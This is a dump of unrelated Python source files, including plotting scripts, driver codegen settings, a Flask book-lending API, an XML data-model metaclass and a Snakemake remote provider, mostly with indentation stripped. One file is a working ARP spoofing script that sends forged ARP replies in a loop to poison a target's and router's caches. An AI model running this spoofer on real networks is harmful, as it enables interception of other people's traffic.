    Actions, rewards and bid_limit can be rescaled for presentation (rescale = [factor for actions, factor for rewards, factor for bid_limit]).
    Also takes the moving median over a predefined window (default = 9) for smoothing the plotted lines.
    '''
med_actions, med_rewards = moving_median_rewards_actions(data,run,episodes, moving_window)
# rescale data
med_actions = med_actions*rescale[0]
med_rewards = med_rewards*rescale[1]
bid_limit = bid_limit*rescale[2]
plt.plot([bid_limit]*episodes, color='grey',label = 'Bid Limit' , lw =1)
if NE != 'none':
plt.plot([NE]*episodes, color='C0', label = 'Nash Equilibrium', lw =1)
for i in range(number_of_agents):
if curves == 'actions':
plt.plot(med_actions[1:,i], 'C{}'.format(i+1), label = 'Bids Agent{}'.format(i), lw =1, linestyle = '--') # displaying actions
plt.ylabel('Action')
elif curves == 'rewards':
            plt.plot(med_rewards[1:,i], 'C{}'.format(i+1), label = 'Rewards Agent{}'.format(i), lw =1) # displaying rewards
plt.ylabel('Reward')
else:
plt.plot(med_actions[1:,i], 'C{}'.format(i+1), label = 'Bids Agent{}'.format(i), lw =1, linestyle = '--')
plt.plot(med_rewards[1:,i], 'C{}'.format(i+1), label = 'Rewards Agent{}'.format(i), lw =1) # displaying rewards
plt.ylabel('Reward/Action')
plt.xlabel('Episode')
plt.legend(loc=4, prop={'size': 7})
plt.title('{}'.format(title))
plt.plot()
def moving_median_rewards_actions(data,run, episodes=15000, n=9):
    '''
    Reads actions and rewards for all episodes of a specific run from the dictionary
    and calculates the moving median over a window of size "n".
    '''
# get data from dictionary
actions =[data[run][i]['actions'] for i in range(episodes)]
rewards =[data[run][i]['rewards'] for i in range(episodes)]
actions= np.squeeze(np.asarray(actions))
rewards= np.squeeze(np.asarray(rewards))
med_rewards = []
med_actions = []
#moving median of n_th step (takes median from n rows and outputs an array of the same length as the input)
for i in range(episodes):
temp_actions =np.median(actions[i:n], axis=0)
temp_rewards =np.median(rewards[i:n], axis=0)
med_actions.append(temp_actions)
med_rewards.append(temp_rewards)
n += 1
    recompiled_actions = np.asarray(med_actions)
    recompiled_rewards = np.asarray(med_rewards)
    return recompiled_actions, recompiled_rewards
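# --- Hedged usage sketch (added for illustration; not part of the original code) ---
# Illustrates the dictionary layout the two helpers above expect
# (data[run][episode] -> {'actions': ..., 'rewards': ...}). The random values,
# agent count and episode count below are arbitrary assumptions.
def _example_plot_usage(episodes=20, number_of_agents=2):
    data = {0: {ep: {'actions': np.random.rand(1, number_of_agents),
                     'rewards': np.random.rand(1, number_of_agents)}
                for ep in range(episodes)}}
    med_actions, med_rewards = moving_median_rewards_actions(
        data, run=0, episodes=episodes, n=5)
    plot_run_outcome(data, number_of_agents, bid_limit=1.0, NE='none',
                     episodes=episodes, run=0, curves='actions',
                     moving_window=5)
    return med_actions, med_rewards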
|
python
|
# These dictionaries are applied to the generated attributes dictionary at build time
# Any changes to the API should be made here. attributes.py is code generated
# We are not code genning attributes that have been marked as obsolete prior to the initial
# Python API bindings release
attributes_codegen_method = {
1150001: { "codegen_method": "no" }, # ID_QUERY_RESPONSE
1150031: { "codegen_method": "no" }, # SAMPLE_DELAY_MODE
1050401: { "codegen_method": "no" }, # GROUP_CAPABILITIES - IVI Attribute - #824
1050021: { "codegen_method": "no" }, # INTERCHANGE_CHECK - IVI Attribute - #824
1050002: { "codegen_method": "no" }, # RANGE_CHECK - IVI Attribute - #824
1050006: { "codegen_method": "no" }, # RECORD_COERCIONS - IVI Attribute - #824
1050515: { "codegen_method": "no" }, # SPECIFIC_DRIVER_CLASS_SPEC_MAJOR_VERSION - IVI Attribute - #824
1050516: { "codegen_method": "no" }, # SPECIFIC_DRIVER_CLASS_SPEC_MINOR_VERSION - IVI Attribute - #824
1050302: { "codegen_method": "no" }, # SPECIFIC_PREFIX - IVI Attribute - #824
1050003: { "codegen_method": "no" }, # QUERY_INSTR_STATUS - IVI Attribute - #824
1050101: { "codegen_method": "no" }, # PRIMARY_ERROR - IVI Attribute - #824
1050102: { "codegen_method": "no" }, # SECONDARY_ERROR - IVI Attribute - #824
1050103: { "codegen_method": "no" }, # ERROR_ELABORATION - IVI Attribute - #824
1050501: { "codegen_method": "no" }, # ENGINE_MAJOR_VERSION - IVI Attribute - #824
1050502: { "codegen_method": "no" }, # ENGINE_MINOR_VERSION - IVI Attribute - #824
1050553: { "codegen_method": "no" }, # ENGINE_REVISION - IVI Attribute - #824
1050004: { "codegen_method": "no" }, # CACHE - IVI Attribute - #824
1150034: { "codegen_method": "no" }, # LATENCY - EOL hardware only - #875
1150003: { "codegen_method": "no" }, # SHUNT_VALUE - EOL hardware only - #875
1150002: { "codegen_method": "no" }, # MEAS_DEST_SLOPE - EOL hardware only - #875
1150010: { "codegen_method": "no" }, # SAMPLE_TRIGGER_SLOPE - EOL hardware only - #875
1250334: { "codegen_method": "no" }, # TRIGGER_SLOPE - EOL hardware only - #875
}
attributes_converters = {
1150028: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # SETTLE_TIME
1250005: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # TRIGGER_DELAY
1250303: { 'attribute_class': 'AttributeViReal64TimeDeltaSeconds',
'type_in_documentation': 'float in seconds or datetime.timedelta', }, # SAMPLE_INTERVAL
}
attributes_name = {
1150044: { 'name': 'FREQ_VOLTAGE_AUTO_RANGE', }, # extracted metadata has incorrect name #874, internal NI CAR 699520
}
attributes_remove_enum = {
1250003: { "enum": None }, # RESOLUTION, Don't use enum since simple value will do
1250333: { "enum": None }, # POWER_LINE_FREQUENCY, Don't use enum since simple value will do
1150025: { "enum": None }, # CURRENT_SOURCE, Don't use enum since simple value will do
1150029: { "enum": None }, # INPUT_RESISTANCE, Don't use enum since simple value will do
1150053: { 'enum': None, 'python_type': 'bool', }, # DC_BIAS, Don't use the enum because a bool will do
1150023: { 'enum': None, 'python_type': 'bool', }, # OFFSET_COMP_OHMS, Don't use the enum because a bool will do
}
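# --- Hedged illustration (added; not part of the original module) ---
# The header comment says these dictionaries are applied to the generated
# attributes dictionary at build time. The merge below is only a hypothetical
# sketch of that step, not the project's actual code-generation logic.
def _apply_overrides_example(generated_attributes):
    """Return a copy of generated_attributes with the override dicts above applied."""
    merged = {attr_id: dict(info) for attr_id, info in generated_attributes.items()}
    for overrides in (attributes_codegen_method, attributes_converters,
                      attributes_name, attributes_remove_enum):
        for attr_id, fields in overrides.items():
            merged.setdefault(attr_id, {}).update(fields)
    return merged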
|
python
|
from Components.Sources.Source import Source
from Components.Network import iNetwork
from Tools.Directories import fileExists
from twisted import version
from socket import has_ipv6, AF_INET6, inet_ntop, inet_pton
def normalize_ipv6(orig):
net = []
if '/' in orig:
net = orig.split('/')
if net[1] == "128":
del net[1]
else:
net.append(orig)
addr = net[0]
addr = inet_ntop(AF_INET6, inet_pton(AF_INET6, addr))
if len(net) == 2:
addr += "/" + net[1]
return (addr)
def getAdapterIPv6(interface):
addr = _("IPv4-only kernel")
if fileExists('/proc/net/if_inet6'):
addr = _("IPv4-only Python/Twisted")
if has_ipv6 and version.major >= 12:
proc = '/proc/net/if_inet6'
tempaddrs = []
for line in file(proc).readlines():
if line.startswith('fe80'):
continue
tmpaddr = ""
tmp = line.split()
if interface == tmp[5]:
tmpaddr = ":".join([tmp[0][i:i + 4] for i in range(0, len(tmp[0]), 4)])
if tmp[2].lower() != "ff":
tmpaddr = "%s/%s" % (tmpaddr, int(tmp[2].lower(), 16))
tempaddrs.append(normalize_ipv6(tmpaddr))
if len(tempaddrs) > 1:
tempaddrs.sort()
addr = ', '.join(tempaddrs)
elif len(tempaddrs) == 1:
addr = tempaddrs[0]
elif len(tempaddrs) == 0:
addr = _("none/IPv4-only network")
return (addr)
class Interface:
def __init__(self, name):
self.name = name
self.mac = None
self.dhcp = None
self.ip = None
self.netmask = None
self.gateway = None
self.ipv6 = None
class Network(Source):
LAN = 0
WLAN = 1
def __init__(self, device=LAN):
Source.__init__(self)
if device is self.LAN:
self.iface = "eth0"
elif device is self.WLAN:
self.iface = "ath0"
ConvertIP = lambda self, l: "%s.%s.%s.%s" % tuple(l) if l and len(l) == 4 else "0.0.0.0"
def getInterface(self):
iface = Interface(self.iface)
iface.mac = iNetwork.getAdapterAttribute(self.iface, "mac")
iface.dhcp = iNetwork.getAdapterAttribute(self.iface, "dhcp")
iface.ip = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "ip"))
iface.netmask = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "netmask"))
iface.gateway = self.ConvertIP(iNetwork.getAdapterAttribute(self.iface, "gateway"))
iface.ipv6 = getAdapterIPv6(self.iface)
return iface
interface = property(getInterface)
def getList(self):
return [
(
ifname,
iNetwork.getAdapterAttribute(ifname, "mac"),
iNetwork.getAdapterAttribute(ifname, "dhcp"),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "ip")),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "netmask")),
self.ConvertIP(iNetwork.getAdapterAttribute(ifname, "gateway")),
getAdapterIPv6(ifname)
)
for ifname in iNetwork.getConfiguredAdapters()
]
list = property(getList)
lut = {
"Name": 0,
"Mac": 1,
"Dhcp": 2,
"Ip": 3,
"Netmask": 4,
"Gateway": 5,
"Ipv6": 6,
}
|
python
|
from services.lib.config import Config
from services.lib.db import DB
from localization.base import BaseLocalization
from localization.eng import EnglishLocalization
from localization.rus import RussianLocalization
from services.lib.utils import Singleton
class LocalizationManager(metaclass=Singleton):
def __init__(self, cfg: Config):
self.config = cfg
self.default = EnglishLocalization(cfg)
self._langs = {
'rus': RussianLocalization(cfg),
'eng': self.default
}
def get_from_lang(self, lang) -> BaseLocalization:
return self._langs.get(str(lang), self.default)
@staticmethod
def lang_key(chat_id):
return f'user:lang:{chat_id}'
async def get_lang(self, chat_id, db: DB) -> str:
redis = await db.get_redis()
lang = await redis.get(self.lang_key(chat_id))
return lang if lang else None
async def set_lang(self, chat_id, lang, db: DB):
redis = await db.get_redis()
await redis.set(self.lang_key(chat_id), str(lang))
return await self.get_from_db(chat_id, db)
async def get_from_db(self, chat_id, db: DB) -> BaseLocalization:
lang = await self.get_lang(chat_id, db)
return self.get_from_lang(lang)
|
python
|
import cv2
import numpy as np
img = cv2.imread("Resources/lena.png")
kernel = np.ones((5,5),np.uint8)
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0)
imgCanny = cv2.Canny(img,150,200)
imgDialation = cv2.dilate(imgCanny,kernel,iterations=1)
imgEroded = cv2.erode(imgDialation,kernel,iterations=1)
cv2.imshow("Gray Image",imgGray)
cv2.imshow("Blur Image",imgBlur)
cv2.imshow("Canny Image",imgCanny)
cv2.imshow("Dialation Image",imgDialation)
cv2.imshow("Eroded Image",imgEroded)
cv2.waitKey(0)
|
python
|
from __future__ import annotations
from collections import defaultdict
from typing import Any, Dict, Optional, Tuple
from .fields import Field, ModelField
from .validation import Validation
class ModelBase:
__slots__ = ()
def __init__(self):
pass
@classmethod
def get_xmltag(cls) -> str:
xmltag = getattr(cls, "__xmltag__", None)
if xmltag is None:
xmltag = cls.__name__
xmlns = getattr(cls, "__xmlns__", None)
if xmlns:
return "{" + xmlns + "}" + xmltag
else:
return xmltag
def get_xmlattrs(self) -> Dict[str, str]:
return {}
class ModelMetaclass(type):
def __new__(cls, name, bases, dct):
_meta = {}
# Add fields from subclasses
for b in bases:
if not issubclass(b, ModelBase):
continue
b_meta = getattr(b, "_meta", None)
if b_meta is None:
continue
_meta.update(b_meta)
# Add fields from the class itself
slots = []
for field_name, val in list(dct.items()):
if isinstance(val, Field):
# Store its description in the Model _meta
_meta[field_name] = val
val.set_name(field_name)
elif isinstance(val, type) and issubclass(val, ModelBase):
# Store its description in the Model _meta
val = ModelField(val)
_meta[field_name] = val
val.set_name(field_name)
else:
# Leave untouched
continue
# Remove field_name from class variables
dct.pop(field_name)
# Add it as a slot in the instance
slots.append(field_name)
dct["__slots__"] = slots
res = super().__new__(cls, name, bases, dct)
res._meta = _meta
return res
class Model(ModelBase, metaclass=ModelMetaclass):
"""
Declarative description of a data structure that can be validated and
serialized to XML.
"""
__slots__ = ()
def __init__(self, *args, **kw):
super().__init__()
for name, value in zip(self._meta.keys(), args):
kw[name] = value
for name, field in self._meta.items():
value = kw.pop(name, None)
if value is None:
value = field.get_construct_default()
else:
value = field.clean_value(value)
setattr(self, name, value)
def update(self, *args, **kw):
"""
Set multiple values in the model.
Arguments are treated in the same way as in the constructor. Any field
not mentioned is left untouched.
"""
for name, value in zip(self._meta.keys(), args):
setattr(self, name, value)
for name, value in kw.items():
setattr(self, name, value)
def has_value(self):
for name, field in self._meta.items():
if field.has_value(getattr(self, name)):
return True
return False
@classmethod
def clean_value(cls, value: Any) -> Optional["Model"]:
"""
Create a model from the given value.
Always make a copy even if value is already of the right class, to
prevent mutability issues.
"""
if value is None:
return None
if isinstance(value, dict):
return cls(**value)
elif isinstance(value, ModelBase):
kw = {}
for name, field in cls._meta.items():
kw[name] = getattr(value, name, None)
return cls(**kw)
else:
raise TypeError(f"{cls.__name__}: {value!r} is {type(value).__name__}"
" instead of a Model or dict instance")
def validate_fields(self, validation: Validation):
for name, field in self._meta.items():
field.validate(validation, getattr(self, name))
def validate_model(self, validation: Validation):
pass
def validate(self, validation: Validation):
self.validate_fields(validation)
self.validate_model(validation)
def to_jsonable(self):
res = {}
for name, field in self._meta.items():
value = field.to_jsonable(getattr(self, name))
if value is not None:
res[name] = value
return res
def to_python(self, **kw) -> str:
args = []
for name, field in self._meta.items():
value = getattr(self, name)
if not field.has_value(value):
continue
args.append(name + "=" + field.to_python(value, **kw))
namespace = kw.get("namespace")
if namespace is None:
constructor = self.__class__.__module__ + "." + self.__class__.__qualname__
elif namespace is False:
constructor = self.__class__.__qualname__
else:
constructor = namespace + "." + self.__class__.__qualname__
return "{}({})".format(constructor, ", ".join(args))
def to_xml(self, builder):
with builder.element(self.get_xmltag(), **self.get_xmlattrs()) as b:
for name, field in self._meta.items():
field.to_xml(b, getattr(self, name))
    def __setattr__(self, key: str, value: Any):
field = self._meta.get(key, None)
if field is not None:
value = field.clean_value(value)
super().__setattr__(key, value)
    def _to_tuple(self) -> Tuple[Any, ...]:
return tuple(getattr(self, name) for name in self._meta.keys())
def __eq__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self != has_other:
return False
return self._to_tuple() == other._to_tuple()
def __ne__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self != has_other:
return True
return self._to_tuple() != other._to_tuple()
def __lt__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self and not has_other:
return False
if not has_self and has_other:
return True
return self._to_tuple() < other._to_tuple()
def __gt__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return False
if has_self and not has_other:
return True
if not has_self and has_other:
return False
return self._to_tuple() > other._to_tuple()
def __le__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self and not has_other:
return False
if not has_self and has_other:
return True
return self._to_tuple() <= other._to_tuple()
def __ge__(self, other):
other = self.clean_value(other)
has_self = self.has_value()
has_other = other is not None and other.has_value()
if not has_self and not has_other:
return True
if has_self and not has_other:
return True
if not has_self and has_other:
return False
return self._to_tuple() >= other._to_tuple()
def __str__(self):
vals = []
for name, field in self._meta.items():
vals.append(name + "=" + field.to_str(getattr(self, name)))
return "{}({})".format(self.__class__.__name__, ", ".join(vals))
def __repr__(self):
vals = []
for name, field in self._meta.items():
vals.append(name + "=" + field.to_str(getattr(self, name)))
return "{}({})".format(self.__class__.__name__, ", ".join(vals))
def from_etree(self, el):
if el.tag != self.get_xmltag():
raise RuntimeError("element is {} instead of {}".format(el.tag, self.get_xmltag()))
tag_map = {field.get_xmltag(): (name, field) for name, field in self._meta.items()}
# Group values by tag
by_name = defaultdict(list)
for child in el:
try:
name, field = tag_map[child.tag]
except KeyError:
raise RuntimeError("found unexpected element {} in {}".format(child.tag, el.tag))
by_name[name].append(child)
for name, elements in by_name.items():
field = self._meta[name]
if field.multivalue:
setattr(self, name, field.from_etree(elements))
elif len(elements) != 1:
                raise RuntimeError(
                    "found {} {} elements in {} instead of just 1".format(
                        len(elements), elements[0].tag, el.tag))
else:
setattr(self, name, field.from_etree(elements[0]))
def diff(self, diff, other):
has_self = self.has_value()
has_other = other.has_value()
if not has_self and not has_other:
return
if has_self != has_other:
diff.add(None, self, other)
return
for name, field in self._meta.items():
first = getattr(self, name)
second = getattr(other, name)
field.diff(diff, first, second)
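# --- Hedged illustration (added; not part of the original module) ---
# Minimal sketch of the declarative use the Model docstring describes: class
# attributes that are Field instances or nested Model subclasses are collected
# into _meta by ModelMetaclass and turned into slots. Only behaviour visible in
# the metaclass above is exercised here; concrete field classes live in .fields.
def _example_model_declaration():
    class Inner(Model):
        pass
    class Outer(Model):
        inner = Inner  # wrapped in ModelField by ModelMetaclass.__new__
    assert isinstance(Outer._meta["inner"], ModelField)
    assert "inner" in Outer.__slots__
    return Outer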
|
python
|
"""Extension for using climatecontrol with dataclasses."""
from dataclasses import is_dataclass
from typing import Generic, Mapping, Type, TypeVar
import dacite
from climatecontrol.core import Climate as BaseClimate
from climatecontrol.core import SettingsItem as BaseSettingsItem
from climatecontrol.fragment import FragmentPath
T = TypeVar("T")
class SettingsItem(BaseSettingsItem):
@classmethod
def _self_is_mutable(cls, value) -> bool:
return super()._self_is_mutable(value) or is_dataclass(value)
class Climate(BaseClimate, Generic[T]):
"""Climate settings manager for dataclasses."""
_processors = tuple(list(BaseClimate._processors) + [])
def __init__(self, *args, dataclass_cls: Type[T], **kwargs):
"""Initialize dataclass climate object.
Uses a dataclass as a schema to initialize settings and check types.
Args:
            *args, **kwargs: See :class:`climatecontrol.Climate`
            dataclass_cls: Additional argument specific to the dataclass extension. Given a class decorated by :func:`dataclasses.dataclass`, the settings object will be initialized and checked according to the class's specifications and types.
Examples:
>>> from climatecontrol.ext.dataclasses import Climate
>>> from dataclasses import dataclass, field
>>>
>>> @dataclass
... class SettingsSubSchema:
... d: int = 4
...
>>> @dataclass
... class SettingsSchema:
... a: str = 'test'
... b: bool = False
... c: SettingsSubSchema = field(default_factory=SettingsSubSchema)
...
>>> climate = Climate(dataclass_cls=SettingsSchema)
>>> # defaults are initialized automatically:
>>> climate.settings.a
'test'
>>> climate.settings.c.d
4
>>> # Types are checked if given
>>> climate.update({'c': {'d': 'boom!'}})
Traceback (most recent call last):
...
dacite.exceptions.WrongTypeError: wrong value type for field "c.d" - should be "int" instead of value "boom!" of type "str"
See Also:
:module:`dacite`: Used to initialize and check dataclasses.
"""
self.dataclass_cls = dataclass_cls
super().__init__(*args, **kwargs)
@property
def settings(self) -> T:
self.ensure_initialized()
return SettingsItem(self._data, self, FragmentPath())
def parse(self, data: Mapping) -> T:
"""Parse data into the provided dataclass."""
data = super().parse(data)
obj: T = dacite.from_dict(self.dataclass_cls, {k: v for k, v in data.items()})
return obj
|
python
|
from flask import Blueprint, request, Response, json
from main.models import database
import csv
mypage_page = Blueprint('mypage', __name__)
def read_csv(user_id):
file = csv.reader(open('../main/recommendation/recommend_list/{}.csv'.format(user_id), 'r',encoding='utf-8'))
lists = []
for row in file:
        # Check what data each column holds and store it in the list
if row[2] == 'title':
continue
lists.append(database.Book.objects(isbn=row[1]))
return lists
def read_borrow(borrow_list):
borrow_lists = []
    # Use the book API to fetch images and other data
for embook in borrow_list:
borrow_lists.append(database.Book.objects(isbn=embook['isbn']).first())
return borrow_lists
@mypage_page.route('/', methods=['GET'])
def mypage():
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
            # Load borrow_list
borrow_list = []
for embook in database.Unit.objects(name=user.unit).first().books_list:
if embook['user_id']==user_id:
borrow_list.append(embook)
borrow_lists = read_borrow(borrow_list)
            # Load recommend_list (loaded from a CSV file)
recommend_list = read_csv(user_id)
            # Load user_data
user_data='https://www.projectlib.tk/image/{}.png'.format(user_id)
            # Server-side recommendation code
from main.recommendation import data_update
data_update.update()
from main.recommendation import wordcloud_maker
wordcloud_maker.exe_img(user_id)
# res
dicts = {
"borrow_list": borrow_lists,
"recommend_list": recommend_list,
"user_data":user_data
}
resultJson = json.dumps(dicts, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
@mypage_page.route('/borrow_list', methods=['GET'])
def borrow():
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
borrow_list = []
for embook in database.Unit.objects(name=user.unit).first().books_list:
if embook['user_id']==user_id:
borrow_list.append(embook)
borrow_lists = read_borrow(borrow_list)
resultJson = json.dumps(borrow_lists, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
@mypage_page.route('/recommend_list', methods=['GET'])
def recommend():
    # Server-side recommendation code
from main.recommendation import data_update
data_update.update()
user_id = request.values.get('user_id')
if user_id:
user = database.User.objects(user_id=user_id).first()
if user:
recommend_list = read_csv(user_id)
resultJson = json.dumps(recommend_list, ensure_ascii=False)
return Response(resultJson, mimetype="application/json", status=200)
resultJson = json.dumps({"message": "not login"})
return Response(resultJson, mimetype="application/json", status=401)
|
python
|
# Imports
import numpy as np
import matplotlib.pyplot as plt
import os
# Results directory
directory = os.path.join("results", "cbis", "history")
figs_directory = os.path.join("results", "cbis", "figures")
# Models
MODELS = ["densenet121", "resnet50", "vgg16"]
# Training Formats
TRAINING_MODE = ["baseline", "baselinedaug", "mldam", "mldamdaug"]
# Go through models
for model in MODELS:
# Go through mode of training
for train_mode in TRAINING_MODE:
# Get filenames
# Train
train_losses = np.load(os.path.join(directory, f"{model}_{train_mode}_tr_losses.npy"), allow_pickle=True)
train_metrics = np.load(os.path.join(directory, f"{model}_{train_mode}_tr_metrics.npy"), allow_pickle=True)
# Validation
val_losses = np.load(os.path.join(directory, f"{model}_{train_mode}_val_losses.npy"), allow_pickle=True)
val_metrics = np.load(os.path.join(directory, f"{model}_{train_mode}_val_metrics.npy"), allow_pickle=True)
# Plot losses
plt.title(f"{model.upper()} | {train_mode.upper()}")
plt.plot(range(len(train_losses)), train_losses, label="Train")
plt.plot(range(len(val_losses)), val_losses, label="Validation")
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.legend()
plt.savefig(os.path.join(figs_directory, f"{model.lower()}_{train_mode.lower()}_loss.png"))
# plt.show()
plt.clf()
# Plot metrics
metrics_dict = {0:"Accuracy", 1:"Recall", 2:"Precision", 3:"F1-Score"}
for metric in range(4):
metric_name = metrics_dict[metric]
plt.title(f"{model.upper()} | {train_mode.upper()}")
plt.plot(range(train_metrics.shape[0]), train_metrics[:, metric], label="Train")
plt.plot(range(val_metrics.shape[0]), val_metrics[:, metric], label="Validation")
plt.ylabel(f"{metric_name}")
plt.xlabel("Epoch")
plt.legend()
plt.savefig(os.path.join(figs_directory, f"{model.lower()}_{train_mode.lower()}_{metric_name.lower()}.png"))
# plt.show()
plt.clf()
|
python
|
import scapy.all as scapy
import time
import termcolor
class ConnectToTarget:
def spoof(self,router_ip,target_ip,router_mac,target_mac ):
packet1=scapy.ARP(op=2, hwdst=router_mac,pdst=router_ip, psrc=target_ip)
packet2=scapy.ARP(op=2, hwdst=target_mac,pdst=target_ip, psrc=router_ip)
scapy.send(packet1)
scapy.send(packet2)
    def get_mac_address(self, ip_address):
broadcast_layer=scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_layer=scapy.ARP(pdst=ip_address)
get_mac_packet=broadcast_layer/arp_layer
answer=scapy.srp(get_mac_packet, timeout=2, verbose=False)[0]
return answer[0][1].hwsrc
def get_ip_and_route_address(self):
target_ip= input(termcolor.colored('[+] Target Ip Address:','yellow'))
        router_ip = input(termcolor.colored('[+] Router Ip Address: ', 'blue'))
target_mac=self.get_mac_address(target_ip)
router_mac=self.get_mac_address(router_ip)
try:
while True:
                self.spoof(router_ip, target_ip, router_mac, target_mac)
time.sleep(2)
except KeyboardInterrupt:
print("Closing ARP Spoofer")
connectTargetObject=ConnectToTarget()
connectTargetObject.get_ip_and_route_address()
|
python
|
"""Test stack
"""
import ARgorithmToolkit
algo = ARgorithmToolkit.StateSet()
stack = ARgorithmToolkit.Stack("st",algo)
def test_declare():
"""Test stack creation
"""
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_declare"
def test_operations():
"""Test stack operations
"""
stack.push(3)
stack.push(9)
assert stack.body == [3,9]
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_push"
assert last_state.content["state_def"]["body"] == stack.body
assert last_state.content["state_def"]["element"] == 9
assert stack.top() == 9
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_top"
assert stack.top() == stack.pop()
last_state = algo.states[-1]
assert last_state.content["state_type"] == "stack_pop"
assert stack.body == [3]
stack.pop()
try:
stack.pop()
except ARgorithmToolkit.ARgorithmError:
pass
def test_size():
"""Test size operations
"""
assert stack.empty() and len(stack)==0
|
python
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2017, Johannes Köster"
__email__ = "[email protected]"
__license__ = "MIT"
import os
import re
import shutil
import subprocess as sp
from datetime import datetime
import time
from snakemake.remote import AbstractRemoteObject, AbstractRemoteProvider
from snakemake.exceptions import WorkflowError
from snakemake.common import lazy_property
from snakemake.logging import logger
if not shutil.which("gfal-copy"):
raise WorkflowError(
"The gfal-* commands need to be available for " "gfal remote support."
)
class RemoteProvider(AbstractRemoteProvider):
supports_default = True
allows_directories = True
def __init__(
self,
*args,
keep_local=False,
stay_on_remote=False,
is_default=False,
retry=5,
**kwargs
):
super(RemoteProvider, self).__init__(
*args,
keep_local=keep_local,
stay_on_remote=stay_on_remote,
is_default=is_default,
**kwargs
)
self.retry = retry
@property
def default_protocol(self):
"""The protocol that is prepended to the path when no protocol is specified."""
return "gsiftp://"
@property
def available_protocols(self):
"""List of valid protocols for this remote provider."""
# TODO gfal provides more. Extend this list.
return ["gsiftp://", "srm://"]
class RemoteObject(AbstractRemoteObject):
mtime_re = re.compile(r"^\s*Modify: (.+)$", flags=re.MULTILINE)
size_re = re.compile(r"^\s*Size: ([0-9]+).*$", flags=re.MULTILINE)
def __init__(self, *args, keep_local=False, provider=None, **kwargs):
super(RemoteObject, self).__init__(
*args, keep_local=keep_local, provider=provider, **kwargs
)
def _gfal(self, cmd, *args, retry=None, raise_workflow_error=True):
if retry is None:
retry = self.provider.retry
_cmd = ["gfal-" + cmd] + list(args)
for i in range(retry + 1):
try:
logger.debug(_cmd)
return sp.run(
_cmd, check=True, stderr=sp.PIPE, stdout=sp.PIPE
).stdout.decode()
except sp.CalledProcessError as e:
if i == retry:
if raise_workflow_error:
raise WorkflowError(
"Error calling gfal-{}:\n{}".format(cmd, e.stderr.decode())
)
else:
raise e
else:
# try again after some seconds
time.sleep(1)
continue
# === Implementations of abstract class members ===
def exists(self):
try:
self._gfal(
"ls", "-a", self.remote_file(), retry=0, raise_workflow_error=False
)
except sp.CalledProcessError as e:
if e.returncode == 2:
# exit code 2 means no such file or directory
return False
else:
raise WorkflowError(
"Error calling gfal-ls:\n{}".format(e.stderr.decode())
)
# exit code 0 means that the file is present
return True
def _stat(self):
stat = self._gfal("stat", self.remote_file())
return stat
def mtime(self):
# assert self.exists()
stat = self._stat()
mtime = self.mtime_re.search(stat).group(1)
date = datetime.strptime(mtime, "%Y-%m-%d %H:%M:%S.%f")
return date.timestamp()
def size(self):
# assert self.exists()
stat = self._stat()
size = self.size_re.search(stat).group(1)
return int(size)
def download(self):
if self.exists():
if self.size() == 0:
# Globus erroneously thinks that a transfer is incomplete if a
# file is empty. Hence we manually touch the local file.
self.local_touch_or_create()
return self.local_file()
# Download file. Wait for staging.
source = self.remote_file()
target = "file://" + os.path.abspath(self.local_file())
# disable all timeouts (file transfers can take a long time)
self._gfal(
"copy", "-p", "-f", "-n", "4", "-t", "0", "-T", "0", source, target
)
os.sync()
return self.local_file()
return None
def upload(self):
target = self.remote_file()
source = "file://" + os.path.abspath(self.local_file())
# disable all timeouts (file transfers can take a long time)
self._gfal("copy", "-p", "-f", "-n", "4", "-t", "0", "-T", "0", source, target)
@property
def list(self):
# TODO implement listing of remote files with patterns
raise NotImplementedError()
def host(self):
return self.local_file().split("/")[0]
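# --- Hedged usage sketch (added; not part of the original module) ---
# In a Snakefile this provider is typically instantiated once and used to wrap
# remote paths, assuming the module is importable as snakemake.remote.gfal.
# The host and paths below are made up for illustration.
#
#   from snakemake.remote.gfal import RemoteProvider as GfalRemoteProvider
#   gfal = GfalRemoteProvider(retry=5)
#
#   rule fetch:
#       input:
#           gfal.remote("gsiftp://se.example.org/project/data/input.txt")
#       output:
#           "results/input.txt"
#       shell:
#           "cp {input} {output}"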
|
python
|
import os
import os.path
import json
import numpy as np
import sys
import itertools
import random
import argparse
import csv
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
UTILS_DIR = os.path.abspath(os.path.join(BASE_DIR, '..', 'utils'))
sys.path.append(UTILS_DIR)
sys.path.append(BASE_DIR)
# sys.path.insert(1, '../utils/')
from data_helper import *
from coord_helper import *
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--home_dir_data", default="../data")
args = parser.parse_args()
home_dir_data = args.home_dir_data
cp_result_folder_dir = os.path.join(home_dir_data, 'dataset_cp')
